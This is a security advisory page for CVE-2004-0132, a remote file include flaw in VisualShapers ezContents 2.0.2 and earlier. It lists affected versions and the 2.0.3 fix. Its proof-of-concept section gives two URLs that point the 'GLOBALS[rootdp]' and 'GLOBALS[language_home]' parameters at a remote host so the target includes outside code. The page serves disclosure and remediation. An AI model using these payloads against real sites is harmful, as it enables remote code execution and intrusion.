VisualShapers ezContents Multiple Module File Include Vulnerability

BID:9638

Info

VisualShapers ezContents Multiple Module File Include Vulnerability

Bugtraq ID: 9638
Class: Input Validation Error
CVE: CVE-2004-0132
Remote: Yes
Local: No
Published: Feb 11 2004 12:00AM
Updated: Jul 12 2009 02:06AM
Credit: The disclosure of this issue has been credited to Cedric Cochin <[email protected]>.
Vulnerable: VisualShapers ezContents 2.0.2
VisualShapers ezContents 2.0.1
VisualShapers ezContents 2.0 rc3
VisualShapers ezContents 2.0 rc2
VisualShapers ezContents 2.0 rc1
VisualShapers ezContents 1.45 b
VisualShapers ezContents 1.44
VisualShapers ezContents 1.43
VisualShapers ezContents 1.42
VisualShapers ezContents 1.41
VisualShapers ezContents 1.40
VisualShapers ezContents 1.4.5
Not Vulnerable: VisualShapers ezContents 2.0.3

Discussion

VisualShapers ezContents Multiple Module File Include Vulnerability

It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.

This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.

Exploit / POC

VisualShapers ezContents Multiple Module File Include Vulnerability

No exploit is required.

The following proof of concept has been provided:
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&amp;GLOBALS[gsLanguage]=ezContents

Solution / Fix

VisualShapers ezContents Multiple Module File Include Vulnerability

Solution:
The vendor has released ezContents 2.0.3 to address this issue. Users are advised to upgrade to the fixed version.


VisualShapers ezContents 1.4.5

VisualShapers ezContents 1.40

VisualShapers ezContents 1.41

VisualShapers ezContents 1.42

VisualShapers ezContents 1.43

VisualShapers ezContents 1.44

VisualShapers ezContents 1.45 b

VisualShapers ezContents 2.0 rc2

VisualShapers ezContents 2.0 rc3

VisualShapers ezContents 2.0 rc1

VisualShapers ezContents 2.0.1

VisualShapers ezContents 2.0.2

References

VisualShapers ezContents Multiple Module File Include Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report